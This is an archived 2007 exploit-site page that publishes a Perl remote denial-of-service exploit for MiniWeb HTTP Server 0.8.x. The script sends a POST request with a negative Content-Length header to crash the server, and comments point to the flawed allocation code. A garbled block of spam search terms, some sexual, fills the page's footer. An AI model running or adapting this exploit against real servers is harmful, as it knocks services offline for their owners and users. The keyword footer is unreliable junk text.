about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MiniWeb Http Server 0.8.x Remote Denial of Service Exploit




2007-06-09 MiniWeb Http Server 0.8.x Remote Denial of Service Exploit
Rated as : High Risk

# MiniWeb Http Server 0.8.x Remote Denial of Service
# MiniWeb site http://sourceforge.net/projects/miniweb/
# Author: gbr
#
# Tested running the server under Windows XP SP2
#
# Description:
#
# The server doesn't do a sanity-check on 'Content-Length' value from POST
Header, allowing the attacker to control
# the allocation size and the position in the 'pucPayload' char pointer to
write.
# This could be used to trigger an exception.
#
#
# Vulnerable code - file http.c | lines 701-702 MiniWeb 0.8.1 | lines 704
- 705 MiniWeb 0.8.19
# ------------------------------------------
#
phsSocket->request.pucPayload=malloc(phsSocket->response.iContentLength+1);
#
phsSocket->request.pucPayload[phsSocket->response.iContentLength]=0;
# ------------------------------------------

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "usage: perl $0 host [port]n";
my $port = shift || 80;

my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort =>
$port, PeerProto => 'tcp')
or die "error: $!n";

$sock->send("POST / HTTP/1.1rn");
$sock->send("Content-Length: -10rnrn");

$sock->close;

print "Exploitedn";
securitydot.net - 2007-06-09

Advertising

Copyright 2007, SecurityDot
Sat, 04 Jul 2009 22:52:03 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.mctsex just dance hauru.php ...y),655 WWW XXL ne sex18 ans wwwsex..co narutochao celebirty Dragonball winklin www.98.com Foto sarah sahin k mobile the sql hello video bf Wwf nude-g administra administra PHP SSCANF sanjay_tew englsh.sex dailymotio buy online Www.Free6. lezbejke mikie www.tamil+ www.XXXvid www.30414. sexy phoyo Trisha sex Sexyindian Www.karala nude pictu manisha ko WWW.SEX.A Www.srilan vbshout.ph Pinkyworld sex Move ***v video gay boys m search/exp cnet.html/ VIDIEO SEX TABOOINDIA www.sexmov mybulletin